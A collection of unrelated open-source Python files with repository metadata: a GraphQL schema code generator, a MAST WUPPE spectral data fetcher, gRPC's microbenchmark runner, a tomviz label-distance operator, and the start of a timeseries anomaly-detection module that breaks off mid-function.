writer.increase_indent() # begin create_type body
writer.line('return GraphQLInputObjectType(')
writer.increase_indent() # begin GraphQLInputObjectType .ctor args
writer.line("name='%s'," % grapple_type.name())
writer.line('fields=lambda: {')
writer.increase_indent() # begin field declarations
for field in grapple_type.fields():
print_graphql_input_field(writer, field)
writer.decrease_indent() # end field declarations
writer.line('},')
writer.decrease_indent() # end GraphQLInputObjectType .ctor args
writer.line(')')
writer.decrease_indent() # end create_type body
writer.decrease_indent() # end class definition
writer.blank_line()
def print_graphql_enum_type(writer, grapple_type):
writer.line('class GraphQL%s(GrappleType):' % grapple_type.name())
writer.increase_indent() # begin class definition
writer.line('@staticmethod')
writer.line('def create_type():')
writer.increase_indent() # begin create_type body
writer.line('return GraphQLEnumType(')
writer.increase_indent() # begin GraphQLEnumType .ctor args
writer.line("name='%s'," % grapple_type.name())
writer.line('values={')
writer.increase_indent() # begin value declarations
for value in grapple_type.values():
writer.line("'%s': GraphQLEnumValue()," % value)
writer.decrease_indent() # end value declarations
writer.line('},')
writer.decrease_indent() # end GraphQLEnumType.ctor args
writer.line(')')
writer.decrease_indent() # end create_type body
writer.decrease_indent() # end class definition
writer.blank_line()
def print_graphql_object_type(writer, document_ast, grapple_type):
writer.line('class GraphQL%s(GrappleType):' % grapple_type.name())
writer.increase_indent() # begin class definition
writer.line('@staticmethod')
writer.line('def create_type():')
writer.increase_indent() # begin create_type body
writer.line('return GraphQLObjectType(')
writer.increase_indent() # begin GraphQLObjectType .ctor args
writer.line("name='%s'," % grapple_type.name())
writer.line('fields=lambda: {')
writer.increase_indent() # begin field declarations
for field in grapple_type.fields():
print_graphql_field(writer, document_ast, field)
writer.decrease_indent() # end field declarations
writer.line('},')
writer.decrease_indent() # end GraphQLObjectType .ctor args
writer.line(')')
writer.decrease_indent() # end create_type body
writer.decrease_indent() # end class definition
writer.blank_line()
def type_instantiation(type_string):
lookup = {
'String': 'GraphQLString',
'Int': 'GraphQLInt',
'ID': 'GraphQLID',
}
if type_string in lookup:
return lookup[type_string]
else:
return 'GraphQL%s.type()' % type_string
def type_ref_string(type_ref):
if type_ref.is_list():
type_ctor = 'list_of(%s)' % type_ref_string(type_ref.list_type())
else:
type_ctor = type_instantiation(type_ref.graphql_type())
if type_ref.is_nullable():
return type_ctor
else:
return 'req(%s)' % type_ctor
def graphql_type_string(type_ref):
graphql_type = ''
if type_ref.is_list():
inner_type = graphql_type_string(type_ref.list_type())
graphql_type = '[%s]' % inner_type
else:
graphql_type = type_ref.graphql_type()
if type_ref.is_nullable():
return graphql_type
else:
return graphql_type + '!'
def print_graphql_field(writer, document_ast, grapple_field):
type_ref_str = type_ref_string(grapple_field.type_ref())
is_enum = document_ast.is_enum(grapple_field.type_ref().graphql_type())
is_simple = grapple_field.is_bare_field() and not is_enum
if is_simple:
writer.line("'%s': GraphQLField(type=%s)," % (grapple_field.name(), type_ref_str))
return
writer.line("'%s': GraphQLField(" % grapple_field.name())
writer.increase_indent() # begin args to GraphQLField .ctor
writer.line('type=%s,' % type_ref_str)
if grapple_field.args():
writer.line('args={')
writer.increase_indent() # begin entries in args dictionary
for grapple_arg in grapple_field.args():
arg_type_ref_str = type_ref_string(grapple_arg.type_ref())
writer.line("'%s': GraphQLArgument(type=%s)," % (grapple_arg.name(), arg_type_ref_str))
writer.decrease_indent() # end entries in args dictionary
writer.line('},') # close args dictionary
python_name = grapple_field.python_name()
if is_enum:
writer.line('resolver=lambda obj, args, *_: obj.%s(*args).name if obj.%s(*args) else None,'
% (python_name, python_name))
elif grapple_field.name_requires_lambda():
writer.line('resolver=lambda obj, args, *_: obj.%s(*args),' % python_name)
writer.decrease_indent() # end args to GraphQLField .ctor
writer.line('),') # close GraphQLField .ctor
def print_graphql_input_field(writer, grapple_field):
type_ref_str = type_ref_string(grapple_field.type_ref())
writer.line("'%s': GraphQLInputObjectField(type=%s)," % (grapple_field.name(), type_ref_str))
def graphql_type_to_python_type(graphql_type):
scalars = {
'ID' : UUID,
'Int' : int,
'Float' : float,
'String' : str,
'Boolean' : bool,
'DateTime' : datetime,
}
if graphql_type in scalars:
return scalars[graphql_type].__name__
return graphql_type
class GrappleDocument:
def __init__(self, *, types):
self._types = types
def object_types(self):
return [t for t in self._types if t.is_object()]
def input_types(self):
return [t for t in self._types if t.is_input()]
def enum_types(self):
return [t for t in self._types if t.is_enum()]
def is_enum(self, name):
ttype = self.type_named(name)
return ttype and ttype.is_enum()
def type_named(self, name):
for ttype in self._types:
if ttype.name() == name:
return ttype
class TypeVarietal(Enum):
OBJECT = auto()
INPUT = auto()
ENUM = auto()
class GrappleTypeDefinition:
def __init__(self, *, name, fields, generate_pent, values=None, type_varietal):
self._name = name
self._fields = fields
self._generate_pent = generate_pent
self._type_varietal = type_varietal
self._values = values
@staticmethod
def object_type(*, name, fields, generate_pent):
return GrappleTypeDefinition(
name=name,
fields=fields,
generate_pent=generate_pent,
type_varietal=TypeVarietal.OBJECT)
@staticmethod
def input_type(*, name, fields):
return GrappleTypeDefinition(
name=name,
fields=fields,
generate_pent=False,
type_varietal=TypeVarietal.INPUT)
@staticmethod
def enum_type(*, name, values):
return GrappleTypeDefinition(
name=name,
fields=[],
generate_pent=False,
values=values,
type_varietal=TypeVarietal.ENUM)
def name(self):
return self._name
def has_field(self, name):
for field in self._fields:
if field.name() == name:
return True
return False
def fields(self):
return self._fields
def values(self):
return self._values
def generate_pent(self):
return self._generate_pent
def is_object(self):
return self._type_varietal == TypeVarietal.OBJECT
def is_input(self):
return self._type_varietal == TypeVarietal.INPUT
def is_enum(self):
return self._type_varietal == TypeVarietal.ENUM
class GrappleField:
def __init__(self, *, name, grapple_type_ref, args):
self._name = name
self._grapple_type_ref = grapple_type_ref
self._args = args
self._name_requires_lambda = name == 'id' or is_camel_case(name)
def is_bare_field(self):
return len(self._args) == 0 and not self.name_requires_lambda()
def name(self):
return self._name
def name_requires_lambda(self):
return self._name_requires_lambda
def python_name(self):
if self.name() == 'id':
return 'obj_id'
if is_camel_case(self.name()):
return to_snake_case(self.name())
return self.name()
def type_ref(self):
return self._grapple_type_ref
def args(self):
return self._args
def filter_nodes(nodes, ast_cls):
return filter(lambda node: isinstance(node, ast_cls), nodes)
def has_generate_pent_directive(type_ast):
return 'generatePent' in [dir_node.name.value for dir_node in type_ast.directives]
def create_grapple_type_definition(type_ast):
if isinstance(type_ast, ObjectTypeDefinition):
return create_grapple_object_type(type_ast)
elif isinstance(type_ast, InputObjectTypeDefinition):
return create_grapple_input_type(type_ast)
elif isinstance(type_ast, EnumTypeDefinition):
return create_grapple_enum_type(type_ast)
else:
raise Exception('node not supported: ' + str(type_ast))
def create_grapple_enum_type(enum_type_ast):
grapple_type_name = enum_type_ast.name.value
values = [value_ast.name.value for value_ast in enum_type_ast.values]
return GrappleTypeDefinition.enum_type(
name=grapple_type_name,
values=values,
)
def create_grapple_input_type(input_type_ast):
grapple_type_name = input_type_ast.name.value
grapple_fields = [create_grapple_input_field(field) for field in input_type_ast.fields]
return GrappleTypeDefinition.input_type(
name=grapple_type_name,
fields=grapple_fields,
)
def create_grapple_object_type(object_type_ast):
grapple_type_name = object_type_ast.name.value
grapple_fields = [create_grapple_field(field) for field in object_type_ast.fields]
generate_pent = has_generate_pent_directive(object_type_ast)
return GrappleTypeDefinition.object_type(
name=grapple_type_name,
fields=grapple_fields,
generate_pent=generate_pent,
)
def to_snake_case(camel_case):
with_underscores = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', camel_case)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', with_underscores).lower()
def is_camel_case(string):
return re.search('[A-Z]', string)
class GrappleFieldArgument:
def __init__(self, *, name, type_ref):
self._name = name
self._type_ref = type_ref
def name(self):
return self._name
def type_ref(self):
return self._type_ref
def create_grapple_field_arg(graphql_arg):
if graphql_arg.default_value:
raise Exception('default_value not supported right now')
return GrappleFieldArgument(
name=graphql_arg.name.value,
type_ref=create_grapple_type_ref(graphql_arg.type),
)
def create_grapple_input_field(graphql_field):
return GrappleField(
name=graphql_field.name.value,
grapple_type_ref=create_grapple_type_ref(graphql_field.type),
args=[],
)
def create_grapple_field(graphql_field):
return GrappleField(
name=graphql_field.name.value,
grapple_type_ref=create_grapple_type_ref(graphql_field.type),
args=[create_grapple_field_arg(graphql_arg) for graphql_arg in graphql_field.arguments]
)
class GrappleTypeRef:
def __init__(self, *, graphql_type=None, python_type=None, is_nullable, is_list=False, list_type=None):
param_check(is_nullable, bool, 'is_nullable')
param_check(is_list, bool, 'is_list')
self._graphql_type = graphql_type
self._python_type = python_type
self._is_nullable = is_nullable
self._is_list = is_list
self._list_type = list_type
@staticmethod
def create_list_ref(*, list_type, is_nullable):
return GrappleTypeRef(is_list=True, list_type=list_type, is_nullable=is_nullable)
def graphql_type(self):
return self._graphql_type
def python_type(self):
return self._python_type
def is_nullable(self):
return self._is_nullable
def is_list(self):
return self._is_list
def list_type(self):
return self._list_type
def create_grapple_type_ref(graphql_type_ast):
if isinstance(graphql_type_ast, NamedType):
graphql_type_name = graphql_type_ast.name.value
return GrappleTypeRef(
graphql_type=graphql_type_name,
python_type=graphql_type_to_python_type(graphql_type_name),
is_nullable=True
)
elif isinstance(graphql_type_ast, NonNullType) and isinstance(graphql_type_ast.type, NamedType):
core_graphql_type = graphql_type_ast.type.name.value
return GrappleTypeRef(
graphql_type=core_graphql_type,
python_type=graphql_type_to_python_type(core_graphql_type),
is_nullable=False
)
elif isinstance(graphql_type_ast, ListType):
return GrappleTypeRef.create_list_ref(
list_type=create_grapple_type_ref(graphql_type_ast.type),
is_nullable=True,
)
elif isinstance(graphql_type_ast, NonNullType) and isinstance(graphql_type_ast.type, ListType):
return GrappleTypeRef.create_list_ref(
list_type=create_grapple_type_ref(graphql_type_ast.type.type),
is_nullable=False,
)
raise Exception('not supported')
class CodeWriter:
def __init__(self):
self.lines = []
self.indent = 0
def line(self, text):
self.lines.append((" " * self.indent) + text)
def blank_line(self):
self.lines.append("")
def increase_indent(self):
self.indent += 4
def decrease_indent(self):
if self.indent <= 0:
raise Exception('indent cannot be negative')
self.indent -= 4
def result(self):
return "\n".join(self.lines)
def print_generated_pent(writer, grapple_type):
writer.line('class %sGenerated(Pent):' % grapple_type.name())
writer.increase_indent() # begin class implementation
writer.blank_line()
print_is_input_data_valid(writer, grapple_type)
print_generated_fields(writer, grapple_type.fields())
writer.decrease_indent() # end class definition
def print_if_return_false(writer, if_line):
writer.line(if_line)
writer.increase_indent()
writer.line('return False')
writer.decrease_indent()
def print_is_input_data_valid(writer, grapple_type):
writer.line('@staticmethod')
writer.line('# This method checks to see that data coming out of the database is valid')
writer.line('def is_input_data_valid(data):')
writer.increase_indent()
writer.line("raise Exception('must implement in manual class')")
writer.decrease_indent()
writer.blank_line()
# writer.increase_indent() # begin is_input_data_valid implementation
# print_if_return_false(writer, 'if not isinstance(data, dict):')
# for field in grapple_type.fields():
# type_ref = field.type_ref()
# if type_ref.is_nullable():
# print_optional_data_check(writer, field)
# else:
# print_required_data_check(writer, field)
# writer.line('return True')
# writer.decrease_indent() # end is_input_data_valid implementation
# writer.blank_line()
def print_required_data_check(writer, field):
python_type = field.type_ref().python_type()
graphql_type = graphql_type_string(field.type_ref())
print_if_return_false(
writer,
"if req_data_elem_invalid(data, '%s', %s): # %s: %s" %
(field.python_name(), python_type, field.name(), graphql_type)
)
def print_optional_data_check(writer, field):
python_type = field.type_ref().python_type()
graphql_type = graphql_type_string(field.type_ref())
print_if_return_false(
writer,
"if opt_data_elem_invalid(data, '%s', %s): # %s: %s" %
(field.name(), python_type, field.name(), graphql_type)
)
def print_generated_fields(writer, fields):
for field in fields:
writer.line('def %s(self):' % field.python_name())
writer.increase_indent() # begin property implemenation
if field.type_ref().is_nullable():
writer.line("return self._data.get('%s')" % field.python_name())
else:
writer.line("return self._data['%s']" % field.python_name())
writer.decrease_indent() # end property definition
writer.blank_line()
| {
"content_hash": "8ca1fbfea13bd9c16c3aaf59161300a9",
"timestamp": "",
"source": "github",
"line_count": 559,
"max_line_length": 107,
"avg_line_length": 34.1788908765653,
"alnum_prop": 0.6438815031927143,
"repo_name": "schrockntemp/graphscaletemp",
"id": "f7695927f99f11ca454a30471704f2db88b0b417",
"size": "19106",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "graphscale/grapple/grapple_parser.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "184175"
}
],
"symlink_target": ""
} |
"""
.. module:: mpl_get_data_wuppe
:synopsis: Returns WUPPE spectral data as a JSON string through Randy's
mast_plot.pl service.
.. moduleauthor:: Scott W. Fleming <fleming@stsci.edu>
"""
import collections
from operator import itemgetter
from data_series import DataSeries
import requests
#--------------------
def mpl_get_data_wuppe(obsid):
"""
Given a WUPPE observation ID, returns the spectral data.
:param obsid: The WUPPE observation ID to retrieve the data from.
:type obsid: str
:returns: JSON -- The spectral data for this observation ID.
Error codes:
0 = No error.
1 = HTTP Error 500 code returned.
2 = "File not found error" returned by mast_plot.pl.
3 = Wavelength and/or flux arrays are zero length.
4 = Wavelength and flux arrays are not of equal length.
"""
# This defines a data point for a DataSeries object as a namedtuple.
data_point = collections.namedtuple('DataPoint', ['x', 'y'])
# For WUPPE, this defines the x-axis and y-axis units as a string.
wuppe_xunit = "Angstroms"
wuppe_yunit = "ergs/cm^2/s/Angstrom"
# Initiate a reqest from Randy's perl script service. Note the return is
# a 3-element list, each element itself if a list containing another list.
return_request = requests.get("https://archive.stsci.edu/cgi-bin/mast_plot"
".pl?WUPPE=" + obsid.lower())
if return_request.status_code == 500:
# If an HTTP 500 error is returned, catch it here, since it can't
# be converted to a JSON string using the built-in json().
errcode = 1
return_dataseries = DataSeries('wuppe', obsid, [], [], [], [], errcode)
else:
return_request = return_request.json()
if not return_request[0]:
# File not found by service.
errcode = 2
return_dataseries = DataSeries('wuppe', obsid, [], [], [], [],
errcode)
else:
# Wavelengths are the first list in the returned 3-element list.
wls = [float(x) for x in return_request[0][0]]
# Fluxes are the second list in the returned 3-element list.
fls = [float("{0:.8e}".format(x)) for x in return_request[1][0]]
# This error code will be used unless there's a problem reading any
# of the FITS files in the list.
errcode = 0
# Make sure wavelengths and fluxes are not empty and are same size.
if wls and fls and len(wls) == len(fls):
# Make sure wavelengths and fluxes are sorted
# from smallest wavelength to largest.
sort_indexes = [x[0] for x in sorted(enumerate(wls),
key=itemgetter(1))]
wls = [wls[x] for x in sort_indexes]
fls = [fls[x] for x in sort_indexes]
# Zip the wavelengths and fluxes into tuples to create the plot
# series.
plot_series = [[data_point(x=x, y=y) for x, y in zip(wls, fls)]]
# Create the return DataSeries object.
return_dataseries = DataSeries('wuppe', obsid, plot_series,
['WUPPE_' + obsid],
[wuppe_xunit], [wuppe_yunit],
errcode)
elif not wls or not fls:
errcode = 3
return_dataseries = DataSeries('wuppe', obsid, [], [], [], [],
errcode)
else:
errcode = 4
return_dataseries = DataSeries('wuppe', obsid, [], [], [], [],
errcode)
# Return the DataSeries object back to the calling module.
return return_dataseries
#--------------------
| {
"content_hash": "1083c39bfb69aa4f3d5368075add1386",
"timestamp": "",
"source": "github",
"line_count": 100,
"max_line_length": 80,
"avg_line_length": 39.54,
"alnum_prop": 0.5424886191198786,
"repo_name": "openSAIL/MASTDataDelivery",
"id": "5f20a6a65cfe3e7121ec5d1e71272572f16dbeab",
"size": "3954",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mpl_get_data_wuppe.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Java",
"bytes": "3204"
},
{
"name": "Python",
"bytes": "189906"
}
],
"symlink_target": ""
} |
import cgi
import multiprocessing
import os
import subprocess
import sys
import argparse
import python_utils.jobset as jobset
import python_utils.start_port_server as start_port_server
sys.path.append(
os.path.join(os.path.dirname(sys.argv[0]), '..', 'profiling',
'microbenchmarks', 'bm_diff'))
import bm_constants
flamegraph_dir = os.path.join(os.path.expanduser('~'), 'FlameGraph')
os.chdir(os.path.join(os.path.dirname(sys.argv[0]), '../..'))
if not os.path.exists('reports'):
os.makedirs('reports')
start_port_server.start_port_server()
def fnize(s):
out = ''
for c in s:
if c in '<>, /':
if len(out) and out[-1] == '_': continue
out += '_'
else:
out += c
return out
# index html
index_html = """
<html>
<head>
<title>Microbenchmark Results</title>
</head>
<body>
"""
def heading(name):
global index_html
index_html += "<h1>%s</h1>\n" % name
def link(txt, tgt):
global index_html
index_html += "<p><a href=\"%s\">%s</a></p>\n" % (cgi.escape(
tgt, quote=True), cgi.escape(txt))
def text(txt):
global index_html
index_html += "<p><pre>%s</pre></p>\n" % cgi.escape(txt)
def collect_latency(bm_name, args):
"""generate latency profiles"""
benchmarks = []
profile_analysis = []
cleanup = []
heading('Latency Profiles: %s' % bm_name)
subprocess.check_call([
'make', bm_name, 'CONFIG=basicprof', '-j',
'%d' % multiprocessing.cpu_count()
])
for line in subprocess.check_output(
['bins/basicprof/%s' % bm_name, '--benchmark_list_tests']).splitlines():
link(line, '%s.txt' % fnize(line))
benchmarks.append(
jobset.JobSpec([
'bins/basicprof/%s' % bm_name,
'--benchmark_filter=^%s$' % line, '--benchmark_min_time=0.05'
],
environ={
'GRPC_LATENCY_TRACE': '%s.trace' % fnize(line)
},
shortname='profile-%s' % fnize(line)))
profile_analysis.append(
jobset.JobSpec([
sys.executable,
'tools/profiling/latency_profile/profile_analyzer.py',
'--source',
'%s.trace' % fnize(line), '--fmt', 'simple', '--out',
'reports/%s.txt' % fnize(line)
],
timeout_seconds=20 * 60,
shortname='analyze-%s' % fnize(line)))
cleanup.append(jobset.JobSpec(['rm', '%s.trace' % fnize(line)]))
# periodically flush out the list of jobs: profile_analysis jobs at least
# consume upwards of five gigabytes of ram in some cases, and so analysing
# hundreds of them at once is impractical -- but we want at least some
# concurrency or the work takes too long
if len(benchmarks) >= min(16, multiprocessing.cpu_count()):
# run up to half the cpu count: each benchmark can use up to two cores
# (one for the microbenchmark, one for the data flush)
jobset.run(benchmarks,
maxjobs=max(1,
multiprocessing.cpu_count() / 2))
jobset.run(profile_analysis, maxjobs=multiprocessing.cpu_count())
jobset.run(cleanup, maxjobs=multiprocessing.cpu_count())
benchmarks = []
profile_analysis = []
cleanup = []
# run the remaining benchmarks that weren't flushed
if len(benchmarks):
jobset.run(benchmarks, maxjobs=max(1, multiprocessing.cpu_count() / 2))
jobset.run(profile_analysis, maxjobs=multiprocessing.cpu_count())
jobset.run(cleanup, maxjobs=multiprocessing.cpu_count())
def collect_perf(bm_name, args):
"""generate flamegraphs"""
heading('Flamegraphs: %s' % bm_name)
subprocess.check_call([
'make', bm_name, 'CONFIG=mutrace', '-j',
'%d' % multiprocessing.cpu_count()
])
benchmarks = []
profile_analysis = []
cleanup = []
for line in subprocess.check_output(
['bins/mutrace/%s' % bm_name, '--benchmark_list_tests']).splitlines():
link(line, '%s.svg' % fnize(line))
benchmarks.append(
jobset.JobSpec([
'perf', 'record', '-o',
'%s-perf.data' % fnize(line), '-g', '-F', '997',
'bins/mutrace/%s' % bm_name,
'--benchmark_filter=^%s$' % line, '--benchmark_min_time=10'
],
shortname='perf-%s' % fnize(line)))
profile_analysis.append(
jobset.JobSpec(
[
'tools/run_tests/performance/process_local_perf_flamegraphs.sh'
],
environ={
'PERF_BASE_NAME': fnize(line),
'OUTPUT_DIR': 'reports',
'OUTPUT_FILENAME': fnize(line),
},
shortname='flame-%s' % fnize(line)))
cleanup.append(jobset.JobSpec(['rm', '%s-perf.data' % fnize(line)]))
cleanup.append(jobset.JobSpec(['rm', '%s-out.perf' % fnize(line)]))
# periodically flush out the list of jobs: temporary space required for this
# processing is large
if len(benchmarks) >= 20:
# run up to half the cpu count: each benchmark can use up to two cores
# (one for the microbenchmark, one for the data flush)
jobset.run(benchmarks, maxjobs=1)
jobset.run(profile_analysis, maxjobs=multiprocessing.cpu_count())
jobset.run(cleanup, maxjobs=multiprocessing.cpu_count())
benchmarks = []
profile_analysis = []
cleanup = []
# run the remaining benchmarks that weren't flushed
if len(benchmarks):
jobset.run(benchmarks, maxjobs=1)
jobset.run(profile_analysis, maxjobs=multiprocessing.cpu_count())
jobset.run(cleanup, maxjobs=multiprocessing.cpu_count())
def run_summary(bm_name, cfg, base_json_name):
subprocess.check_call([
'make', bm_name,
'CONFIG=%s' % cfg, '-j',
'%d' % multiprocessing.cpu_count()
])
cmd = [
'bins/%s/%s' % (cfg, bm_name),
'--benchmark_out=%s.%s.json' % (base_json_name, cfg),
'--benchmark_out_format=json'
]
if args.summary_time is not None:
cmd += ['--benchmark_min_time=%d' % args.summary_time]
return subprocess.check_output(cmd)
def collect_summary(bm_name, args):
heading('Summary: %s [no counters]' % bm_name)
text(run_summary(bm_name, 'opt', bm_name))
heading('Summary: %s [with counters]' % bm_name)
text(run_summary(bm_name, 'counters', bm_name))
if args.bigquery_upload:
with open('%s.csv' % bm_name, 'w') as f:
f.write(
subprocess.check_output([
'tools/profiling/microbenchmarks/bm2bq.py',
'%s.counters.json' % bm_name,
'%s.opt.json' % bm_name
]))
subprocess.check_call([
'bq', 'load', 'microbenchmarks.microbenchmarks',
'%s.csv' % bm_name
])
collectors = {
'latency': collect_latency,
'perf': collect_perf,
'summary': collect_summary,
}
argp = argparse.ArgumentParser(description='Collect data from microbenchmarks')
argp.add_argument('-c',
'--collect',
choices=sorted(collectors.keys()),
nargs='*',
default=sorted(collectors.keys()),
help='Which collectors should be run against each benchmark')
argp.add_argument('-b',
'--benchmarks',
choices=bm_constants._AVAILABLE_BENCHMARK_TESTS,
default=bm_constants._AVAILABLE_BENCHMARK_TESTS,
nargs='+',
type=str,
help='Which microbenchmarks should be run')
argp.add_argument('--bigquery_upload',
default=False,
action='store_const',
const=True,
help='Upload results from summary collection to bigquery')
argp.add_argument(
'--summary_time',
default=None,
type=int,
help='Minimum time to run benchmarks for the summary collection')
args = argp.parse_args()
try:
for collect in args.collect:
for bm_name in args.benchmarks:
collectors[collect](bm_name, args)
finally:
if not os.path.exists('reports'):
os.makedirs('reports')
index_html += "</body>\n</html>\n"
with open('reports/index.html', 'w') as f:
f.write(index_html)
| {
"content_hash": "1e2272c32b218d0ba7136da69619af3a",
"timestamp": "",
"source": "github",
"line_count": 246,
"max_line_length": 84,
"avg_line_length": 35.32113821138211,
"alnum_prop": 0.5509264587409368,
"repo_name": "firebase/grpc",
"id": "4b9cd4bc8e85661f9a9cfeefbcc310b227710f5d",
"size": "9289",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "tools/run_tests/run_microbenchmark.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Awk",
"bytes": "5444"
},
{
"name": "Batchfile",
"bytes": "35774"
},
{
"name": "C",
"bytes": "3708933"
},
{
"name": "C#",
"bytes": "2162951"
},
{
"name": "C++",
"bytes": "12275592"
},
{
"name": "CMake",
"bytes": "495117"
},
{
"name": "CSS",
"bytes": "1519"
},
{
"name": "DTrace",
"bytes": "147"
},
{
"name": "Dockerfile",
"bytes": "169468"
},
{
"name": "Go",
"bytes": "34794"
},
{
"name": "HTML",
"bytes": "14"
},
{
"name": "Java",
"bytes": "6259"
},
{
"name": "JavaScript",
"bytes": "84355"
},
{
"name": "M4",
"bytes": "69163"
},
{
"name": "Makefile",
"bytes": "1104867"
},
{
"name": "Mako",
"bytes": "5629"
},
{
"name": "Objective-C",
"bytes": "696194"
},
{
"name": "Objective-C++",
"bytes": "77574"
},
{
"name": "PHP",
"bytes": "392133"
},
{
"name": "PowerShell",
"bytes": "3226"
},
{
"name": "Python",
"bytes": "3401091"
},
{
"name": "Ruby",
"bytes": "982979"
},
{
"name": "Shell",
"bytes": "532295"
},
{
"name": "Starlark",
"bytes": "554304"
},
{
"name": "Swift",
"bytes": "3516"
},
{
"name": "TSQL",
"bytes": "4901"
},
{
"name": "XSLT",
"bytes": "9846"
}
],
"symlink_target": ""
} |
import tomviz.operators
class LabelObjectDistanceFromPrincipalAxis(tomviz.operators.CancelableOperator):
def transform_scalars(self, dataset, label_value=1, principal_axis=0):
"""Computes the distance from the centroid of each connected component
in the label object with the given label_value to the given principal
axis and store that distance in each voxel of the label object connected
component. A principal_axis of 0 is first principal axis, 1 is the
second, and 2 is third.
"""
import numpy as np
from tomviz import itkutils
from tomviz import utils
self.progress.maximum = 100
self.progress.value = 0
STEP_PCT = [20, 60, 80, 100]
fd = dataset.GetFieldData()
axis_array = fd.GetArray('PrincipalAxes')
assert axis_array is not None, \
"Dataset does not have a PrincipalAxes field data array"
assert axis_array.GetNumberOfTuples() == 3, \
"PrincipalAxes array requires 3 tuples"
assert axis_array.GetNumberOfComponents() == 3, \
"PrincipalAxes array requires 3 components"
assert principal_axis >= 0 and principal_axis <= 2, \
"Invalid principal axis. Must be in range [0, 2]."
axis = np.array(axis_array.GetTuple(principal_axis))
center_array = fd.GetArray('Center')
assert center_array is not None, \
"Dataset does not have a Center field data array"
assert center_array.GetNumberOfTuples() == 1, \
"Center array requires 1 tuple"
assert center_array.GetNumberOfComponents() == 3, \
"Center array requires 3 components"
center = np.array(center_array.GetTuple(0))
# Blank out the undesired label values
scalars = utils.get_scalars(dataset)
scalars[scalars != label_value] = 0
utils.set_scalars(dataset, scalars)
self.progress.value = STEP_PCT[0]
# Get connected components of voxels labeled by label value
def connected_progress_func(fraction):
self.progress.value = \
int(fraction * (STEP_PCT[1] - STEP_PCT[0]) + STEP_PCT[0])
return self.canceled
utils.connected_components(dataset, 0, connected_progress_func)
# Get shape attributes
def label_progress_func(fraction):
self.progress.value = \
int(fraction * (STEP_PCT[2] - STEP_PCT[1]) + STEP_PCT[1])
return self.canceled
shape_label_map = \
itkutils.get_label_object_attributes(dataset, label_progress_func)
num_label_objects = shape_label_map.GetNumberOfLabelObjects()
# Map from label value to distance from principal axis. Used later to
# fill in distance array.
labels = utils.get_scalars(dataset)
max_label = np.max(labels)
label_value_to_distance = [0 for i in range(max_label + 1)]
for i in range(0, num_label_objects):
label_object = shape_label_map.GetNthLabelObject(i)
# Flip the centroid. I have verified that the x and z coordinates
# of the centroid coming out of the shape label objects are swapped,
# so I reverse it here.
centroid = np.flipud(np.array(label_object.GetCentroid()))
v = center - centroid
dot = np.dot(v, axis)
d = np.linalg.norm(v - dot*axis)
label_value_to_distance[label_object.GetLabel()] = d
distance = np.zeros(dataset.GetNumberOfPoints())
for i in range(len(labels)):
distance[i] = label_value_to_distance[labels[i]]
self.progress.value = STEP_PCT[3]
import vtk.util.numpy_support as np_s
distance_array = np_s.numpy_to_vtk(distance, deep=1)
distance_array.SetName('Distance')
dataset.GetPointData().SetScalars(distance_array)
| {
"content_hash": "0b585aec869d2855f3cbac707fd67ec0",
"timestamp": "",
"source": "github",
"line_count": 95,
"max_line_length": 80,
"avg_line_length": 41.410526315789475,
"alnum_prop": 0.6263345195729537,
"repo_name": "mathturtle/tomviz",
"id": "f808de794a00368fdae049e047a1bc7067ac0ac4",
"size": "3934",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "tomviz/python/LabelObjectDistanceFromPrincipalAxis.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C++",
"bytes": "1606132"
},
{
"name": "CMake",
"bytes": "40072"
},
{
"name": "Python",
"bytes": "315727"
},
{
"name": "Shell",
"bytes": "1816"
}
],
"symlink_target": ""
} |
import pandas
import numpy as np
import scipy
import statsmodels.api as sm
import traceback
import logging
from time import time
from msgpack import unpackb, packb
from redis import StrictRedis
from settings import (
ALGORITHMS,
CONSENSUS,
FULL_DURATION,
MAX_TOLERABLE_BOREDOM,
MIN_TOLERABLE_LENGTH,
STALE_PERIOD,
REDIS_SOCKET_PATH,
ENABLE_SECOND_ORDER,
BOREDOM_SET_SIZE,
)
from algorithm_exceptions import *
logger = logging.getLogger("AnalyzerLog")
redis_conn = StrictRedis(unix_socket_path=REDIS_SOCKET_PATH)
"""
This is no man's land. Do anything you want in here,
as long as you return a boolean that determines whether the input
timeseries is anomalous or not.
To add an algorithm, define it here, and add its name to settings.ALGORITHMS.
"""
def two_exp_moving_average(timeseries):
series = pandas.Series([x[1] for x in timeseries])
t1 = pandas.stats.moments.ewma(series, com=21)
t2 = pandas.stats.moments.ewma(series, com=55)
if (abs(t1.iget(-1)) > abs(t2.iget(-1))):
return True
def two_moving_average(timeseries):
series = pandas.Series([x[1] for x in timeseries])
t1 = pandas.rolling_mean(series, 21)
t2 = pandas.rolling_mean(series, 55)
if (abs(t1.iget(-1)) > abs(t2.iget(-1))):
return True
def MACD(timeseries):
series = pandas.Series([x[1] for x in timeseries])
t1 = pandas.stats.moments.ewma(series, com=12)
t2 = pandas.stats.moments.ewma(series, com=26)
t3 = t1 - t2
t4 = pandas.stats.moments.ewma(t3, com=9)
if (abs(t3.iget(-1)) > 2 * abs(t4.iget(-1))):
return True
def tail_avg(timeseries):
"""
This is a utility function used to calculate the average of the last three
datapoints in the series as a measure, instead of just the last datapoint.
It reduces noise, but it also reduces sensitivity and increases the delay
to detection.
"""
try:
t = (timeseries[-1][1] + timeseries[-2][1] + timeseries[-3][1]) / 3
return t
except IndexError:
return timeseries[-1][1]
def median_absolute_deviation(timeseries):
"""
A timeseries is anomalous if the deviation of its latest datapoint with
respect to the median is X times larger than the median of deviations.
"""
series = pandas.Series([x[1] for x in timeseries])
median = series.median()
demedianed = np.abs(series - median)
median_deviation = demedianed.median()
# The test statistic is infinite when the median is zero,
# so it becomes super sensitive. We play it safe and skip when this happens.
if median_deviation == 0:
return False
test_statistic = demedianed.iget(-1) / median_deviation
# Completely arbitary...triggers if the median deviation is
# 6 times bigger than the median
if test_statistic > 6:
return True
def grubbs(timeseries):
"""
A timeseries is anomalous if the Z score is greater than the Grubb's score.
"""
series = scipy.array([x[1] for x in timeseries])
